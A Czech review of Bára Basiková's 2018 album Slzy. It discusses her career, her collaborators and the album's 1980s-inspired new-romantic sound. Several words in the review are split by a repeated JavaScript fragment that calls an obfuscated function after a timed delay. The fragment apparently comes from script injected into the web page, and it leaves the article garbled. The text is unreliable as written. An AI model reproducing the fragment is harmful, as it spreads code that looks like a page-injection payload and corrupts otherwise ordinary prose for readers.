13. 4. 2019
News

Recenze alba Slzy: Sugestivní projev, barvitý a současný sound a poetické texty

Post Image

Bylo by jistě nošením dříví dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do lesa připomínat, že zpěvačka Bára Basiková se v průběhu své úspěšné více než třicetileté kariéry výrazně dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotkla a dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotýká úctyhodné škály nejrůznějších hudebních stylů a žánrů.

Vedle sebe stojí stejně tak první léta s Precedens, stylotvorná pro český novoromantismus, převratný progresivní rock za sólovým mikrofonem Stromboli, jako oceňované muzikálové role, koketování s klasikou, elektronikou i popem.

Ovšem jak potvrzuje prozatím poslední Bářino album Slzy z roku 2018, dělá zpěvačce nadmíru dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobře právě návrat k melancholickým a temně nostalgickým kořenům 80. let. O ně se totiž dvanáct skladeb na albu opírá.

Bylo by ovšem nespravedlivé tvrdit, že se jedná o návrat retrospektivní, o oživování minulosti. Obrazně řečeno, zpěvačka a její hudební spolupracovníci říkají to, co je jejich pocitům blízké, to, z čeho vyrostl jejich pohled na muziku a na svět, ale říkají to jazykem současnosti.

Stejně tak jako jim nesporně blízcí Depeche Mode neznějí v novém tisíciletí identicky jako v osmé dekádě století minulého a přesto zůstávají sami sebou.

Ani album Slzy nezní jako přelomový debut Precedens Doba ledom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dová, ale milovníkům téhle muziky je nesporně blízké.

Bára Basiková se obklopila novými hudebníky. Zásadní autorskou měrou přispěl Richard Ulrych, v 90. letech frontman rovněž novoromantické formace Shannen Grey, později pak skupiny Nebezpečné známosti.

Na zvuku alba má zase lví podíl Luděk Fiala, obratný a citlivý aranžér, producent a skladatel, spjatý se skupinou Decline a někdejší blízký spolupracovník Petra Muka.

Jakkoliv je tvář alba posmutnělá a zádumčivá, není jednotvárná.

Hned úvodní skladba Pravda je zlá přivítá posluchače tažným rytmem, v čemž pokračuje i následná Dreaming.

Oproti nim jsou titulní Slzy baladické až fatálně hymnické.

K tomu všemu připočtěte tradičně sugestivní zpěvaččin projev, barvitý a současný sound a poetické texty a máte zevrubný obrázek aktuálního alba Báry Basikové.

Alba, které míří kupředu pevně opřené o minulost.

Ilja Kučera ml.  

ALBUM SLZY VE SLUŽBÁCH A APLIKACÍCH
Spotify
Apple Music
iTunes Store
Google Play
Deezer